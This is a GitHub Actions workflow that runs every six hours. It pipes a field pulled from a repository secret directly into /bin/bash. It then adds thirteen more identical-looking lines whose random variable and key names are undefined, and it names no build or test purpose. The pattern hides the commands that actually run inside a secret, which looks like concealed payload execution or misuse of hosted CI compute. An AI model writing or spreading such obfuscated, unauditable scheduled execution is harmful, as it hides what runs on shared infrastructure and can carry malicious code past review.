name: zhangshun19871010

on:
  workflow_dispatch:
  schedule:
    - cron: '59 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhangshun19871010
        env:
          lov376: ${{ secrets.lov376 }}
        run: |
          echo $lov376 | jq -r .hahpu500 | /bin/bash
          echo $lzrj6068 | jq -r .bdfyb3089 | /bin/bash
          echo $ho92693 | jq -r .tlp4294 | /bin/bash
          echo $k22849 | jq -r .gmp6 | /bin/bash
          echo $yvvz999 | jq -r .kny9205 | /bin/bash
          echo $oab6 | jq -r .d97795 | /bin/bash
          echo $sj7 | jq -r .kjw5 | /bin/bash
          echo $ggd701 | jq -r .enp22 | /bin/bash
          echo $xnfyh04976 | jq -r .xd71855 | /bin/bash
          echo $cqtyb1193 | jq -r .u54 | /bin/bash
          echo $l902 | jq -r .gl1 | /bin/bash
          echo $o1 | jq -r .eril5464 | /bin/bash
          echo $cxmv19 | jq -r .is7 | /bin/bash
          echo $hq55 | jq -r .hu5849 | /bin/bash

